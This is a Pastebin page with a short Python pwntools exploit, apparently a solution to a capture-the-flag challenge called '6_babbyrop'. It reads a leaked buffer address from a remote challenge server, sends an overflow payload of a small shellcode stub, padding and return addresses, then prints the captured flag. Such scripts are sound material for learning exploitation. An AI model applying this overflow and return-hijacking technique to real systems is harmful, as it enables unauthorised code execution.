Advertisement
Guest User

Untitled

a guest
Aug 21st, 2017
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.81 KB | None | 0 0
  1. from pwn import *
  2.  
  3. dec_address = 0x401020
  4. exit_address = 0x400e70
  5. pop_rdi = 0x00401963
  6. splift = 0x00400f28
  7.  
  8. def main():
  9.     #p = process("./6_babbyrop")
  10.     p = remote("exploitables.dcdark.net", 31337)
  11.  
  12.     # Get buffer address
  13.     address = int(p.readline(), 16)
  14.  
  15.     log.info("Got buffer address: 0x%x" % address)
  16.     #raw_input(str(p.proc.pid))
  17.  
  18.     ropchain = ""
  19.     ropchain += "\xbf\x41\x41\x41\x41"          # mov    edi,0x41414141
  20.     ropchain += "\xc3"                          # ret
  21.     ropchain = ropchain.ljust(24, "A")
  22.     ropchain += p64(address)
  23.     ropchain += p64(dec_address)
  24.     p.send(ropchain)
  25.  
  26.     flag = p.readline().strip()
  27.  
  28.     if "key" in flag:
  29.         log.success("Flag: %s" % flag)
  30.     else:
  31.         log.info("Exploit failed.")
  32.  
  33.  
  34.  
  35. if __name__ == "__main__":
  36.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement